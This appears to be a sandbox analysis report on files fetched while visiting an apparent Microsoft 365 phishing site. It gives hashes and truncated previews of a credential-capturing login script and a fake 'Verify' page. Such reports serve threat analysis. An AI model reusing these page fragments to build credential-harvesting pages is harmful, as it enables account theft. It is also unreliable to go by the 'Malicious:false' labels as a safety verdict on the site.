                        SHA1:43DA0594BCD09EB2CD6EF4F703CA40E4D6FA2C14
                        SHA-256:4131357EE671EBC7F0430BC803D04A0CB7170D8F98302071D5C061AA6F93CF4E
                        SHA-512:5FE748705592E1E5BD7D43F3D71A2EDF139B724FFC9A58B9122E1B22EBC6DA79EA4D259E1DD8C7744018563B5EF9CE5F6A02D9A972683ADE194AE74C0F70A242
                        Malicious:false
                        Reputation:unknown
                        URL:https://telegra.ph/images/icons.png?1
                        Preview:.PNG........IHDR...(..........7......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....UU............t.".eGs.d .0-.a.&.F.ML.....69N...".T8.CG!.......dM.]3...0...'............{.=K.3...g....w...s.).J..Pk<..$ ..H@.....*.....B..~.....r....P.;..`..j+=v.E.W.....t.oupch..o.#..ok}.....}..qOCMI..+.bm.........i.../A.5n.tS.V.e7#......S7#.=.yk.*./u....}..F8..~.'@....\.... 5U.._.N...t)..j=.g.>.....$ ..H@.....$..7`U.B.P.......5&....Zh..R,.w.r......D.........h.?.E....`..j.0..M..q....F....G.....p.. ......4.i.C...[.].(..&..:......:.........U#.$..j.... .....Q.?.:I....$ ..H@......*..H,7....#.(.....j...-...9.z.G@o.`.-.Q..1..[...9\W.q.4s.)..n.m....?.n.o.X./..W.R........hL...6.0hxL}..P~]......FKN.P.GC....+..t3.....M..l.@s.V.n.jT..-..5...9.;.......$ ..H@..,.B...Z+3.c...b.....,..$..^i.?-......j$. .A.d...+|k.~..."E.......?.......Q......A..Q. ..k..? ......Q. ......?..j....5..H@.....$ .{...w!t..?r.&:R...l...f..|.?..0.7..c.....M.?/O...b.tBh_...q...y..).LE..%.2...v.G.6..l..I...
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):6688
                        Entropy (8bit):4.6031244166534835
                        Encrypted:false
                        SSDEEP:
                        MD5:60C2B648C2E243A913CE86B0612A9762
                        SHA1:DB8178BE28F8483D2BBE1599B9E35A458E856E0D
                        SHA-256:8E06C2D6F88FFF071B284B9578900FCCED20420F78E1F7B36A332E55780818A7
                        SHA-512:C5F5C40F402F6AA71C8C23F66244821D1B522CF281EC4C71936667539755C0BB5F151D14935E87B04101A9B465F1B70BE3565CDA00F702011D04DCEEA7BB7CB8
                        Malicious:false
                        Reputation:unknown
                        Preview:console.log('Script file loaded');....document.addEventListener('DOMContentLoaded', function () {.. console.log('DOM content loaded - initializing login functionality');.... const usernameInput = document.getElementById('username');.. const passwordInput = document.getElementById('password');.. const nextButton = document.getElementById('nextButton');.. const errorMessage = document.getElementById('errorMessage');.. const errorMessagePassword = document.getElementById('errorMessagePassword');.. const loginForm = document.getElementById('loginForm');.... passwordInput.style.display = 'none';.... nextButton.addEventListener('click', async function () {.. console.log('Next button clicked - starting validation');.... const trimmedUsername = usernameInput.value.trim();.. const trimmedPassword = passwordInput.value.trim();.... if (passwordInput.style.display === 'none') {.. if (!trimmedUsername) {.. errorMessage
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 157 x 150, 8-bit/color RGBA, non-interlaced
                        Category:downloaded
                        Size (bytes):6548
                        Entropy (8bit):7.956555604178425
                        Encrypted:false
                        SSDEEP:
                        MD5:A7BC5F270EAD4F9B7C441918CD005CD5
                        SHA1:7C404B8B01DEFFE8C6A71C91ED2AE0BCE0C14F2A
                        SHA-256:F52221C3C3691C45D8625F3359C6F1CAFE0B3A8A488795736B2211593B73066C
                        SHA-512:4E9DEE1A35B92A3731643E0854974F3A22F3D873B33B24299E05E76DFEDCD0C38206E0721C93121A67E7F21316B6C0F95B2FDD956A7B5934136C971E14E1B25A
                        Malicious:false
                        Reputation:unknown
                        URL:https://office365-mauve.vercel.app/images/test3.PNG
                        Preview:.PNG........IHDR....................sRGB.........gAMA......a.....pHYs...t...t..f.x...)IDATx^.yx.......l..l..&.l.]g..d....C2...... ....0...6../....Ot...!a@ .B..H...4....[.466....==.~..}x....._._.W....Y.D...,.%C'Kt....]2t.D...,.%C'Kt....]2t.D...,.%C'Kt..=C..._............Q.....Y... ..M..o".SF...pX&.&....0...r.$T...e.qm.j....W....lh....m..$C.....ee.v..J...Es`.....0.....5.f....E.@6a....,c.....>.z...%.Q...(..D}U.z.. ........Y...y.-.f..3.R&.......^.......i......E.....f.....Q..].IiZE.n.9..+..4m.L.4r...\....DB..H..'...U(...U..P.z.t..6..H...+a...#..4.q]x..1..G.)...d<YWZ...N.[...,t42..jT.=..`f|f".3..,q..h.4.&2..~.MTe.............ghkkPqd?....Hf.L...hz....G...L.c.~....A.D...P..........@...Y.Z......^....t.....gQO...QZ..P..FZ~!3.-.@UR....W.+......rPG.9.r...4...g...NC...).l.ISn...t...^hIG......,....w,.k..>7.=..zn.]wW..s..X........lz.........4l.IGn..Y.EC.QhH....W..~d:.2.M.....o~&..[@G;L}.......L/..(....GA.r...%..+y...i#..(.,e. \.+..f...../|*.......7MR.R.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (16772), with no line terminators
                        Category:dropped
                        Size (bytes):16772
                        Entropy (8bit):5.433347277750894
                        Encrypted:false
                        SSDEEP:
                        MD5:F983DBF664D416EDFF89057D892E2BB5
                        SHA1:0F6EAB722FFEDA3A62E62151EDEFF15A07C3CED4
                        SHA-256:24923CB2AC81AFE909F228D38891F3DDBDB64B0374CC821585975D1ED1E20370
                        SHA-512:EC6ACFED6F81DF0EC4DB68115A10B9C56F5D6EE0932BA7525AB756CF870E50AB888701231D05E21C5A2A480F13A6D3F46A9B75FA24781AC534CFAA7F77F7CD34
                        Malicious:false
                        Reputation:unknown
                        Preview:!function(e){"use strict";function t(e,i,a){var o,r=document.createElement("img");if(r.onerror=function(o){return t.onerror(r,o,e,i,a)},r.onload=function(o){return t.onload(r,o,e,i,a)},t.isInstanceOf("Blob",e)||t.isInstanceOf("File",e))o=r._objectURL=t.createObjectURL(e);else{if("string"!=typeof e)return!1;o=e,a&&a.crossOrigin&&(r.crossOrigin=a.crossOrigin)}return o?(r.src=o,r):t.readFile(e,function(e){var t=e.target;t&&t.result?r.src=t.result:i&&i(e)})}function i(e,i){!e._objectURL||i&&i.noRevoke||(t.revokeObjectURL(e._objectURL),delete e._objectURL)}var a=window.createObjectURL&&window||window.URL&&URL.revokeObjectURL&&URL||window.webkitURL&&webkitURL;t.isInstanceOf=function(e,t){return Object.prototype.toString.call(t)==="[object "+e+"]"},t.transform=function(e,i,a,o,r){a(t.scale(e,i,r),r)},t.onerror=function(e,t,a,o,r){i(e,r),o&&o.call(e,t)},t.onload=function(e,a,o,r,n){i(e,n),r&&t.transform(e,n,r,o,{})},t.transformCoordinates=function(){},t.getTransformedOptions=function(e,t){var
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text, with CRLF line terminators
                        Category:downloaded
                        Size (bytes):8080
                        Entropy (8bit):4.386101737943744
                        Encrypted:false
                        SSDEEP:
                        MD5:7E77A8A511653CEE0E72AC1E21779F6D
                        SHA1:32D3D70275167D89B2AB7486BF3D3846A1CDB68E
                        SHA-256:8DB7F86395266351D8E88F5E6A1385DCC420E769A9C59FDA5A9014F824CA45F8
                        SHA-512:A02985987E18FE6EAE988E03A976A1F32FC42F652E7F9A9193862F65F03728069D480362E704B9A623B6EFE57A495C4A107E0622DD4330EBB22857F17569625B
                        Malicious:false
                        Reputation:unknown
                        URL:https://office365-mauve.vercel.app/next.html
                        Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <link rel="icon" href="images/logo.png" type="image/x-icon">.. <title>Microsoft 365 | Verify</title>.. <link rel="stylesheet" href="css/next.css" />.. <style>.. #verifyButton,.. #appCodeInput,.. #errorMessage,.. #errorMessagePassword,.. #errorMessageIncomplete {.. display: none;.. margin-top: 10px;.. }.... /* Center the input field */.. #appCodeInput {.. width: 60%;.. margin: 0 auto;.. }.... /* Style for the error messages */.. .errorMessage {.. color: red;.. margin-left: 6px;.. font-size: 16px;.. font-weight: 700;.. }.. </style>..</head>..<body>.. <div class="login-container">.. <div class="header">.. <img src="images/test3.PNG" al
                        No static file info